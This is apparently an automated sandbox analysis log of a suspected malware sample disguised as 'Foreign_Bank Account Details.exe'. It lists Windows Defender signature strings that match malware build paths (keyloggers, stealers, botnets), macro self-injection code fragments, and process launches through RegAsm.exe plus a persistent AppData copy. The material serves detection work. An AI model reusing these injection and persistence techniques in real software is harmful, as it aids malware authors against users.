Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: GBD:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: C>:\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: B*\AF:\learn\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: \gugu.vbp]
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Cactilio - Joiner.+\\Src\\Stub\\YvcGVCI.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: >\YPKISS~1\ULTIMA~1\ULTIMA~1.VBP
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: :Black Dream\Server\Server.vbp]
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: <7.+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: d_C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: *\AG:\AM\Fonte\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: |C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: KFC:\\Documents and Settings\\VAIO\\Desktop\\2012\\[a-zA-Z]+\\GbpSv.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: ,'.+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Foreign_Bank Account Details.exe 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe'
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.256.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe /q WD
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 42_2_00007FF650D4F118
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM SdnEx WHERE SdnEx.Key = ?;SELECT Key, CurrentCount FROM SdnEx WHERE Key = ?DELETE FROM SdnEx WHERE SdnEx.Key = ?;SELECT Count(1) FROM SdnEx;INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);DELETE FROM SdnEx;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18242976274.0000015B0B50C000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes; DELETE FROM FileHashes WHERE FileHashes.Key = ?; DELETE FROM FileHashes WHERE InstanceTimeStamp < ?; INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);SELECT Key FROM FileHashes WHERE FileHashes.Key = ?; SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?; SELECT Key FROM FileHashes ORDER BY InstanceTimeStamp ASC LIMIT 1
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(30, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;
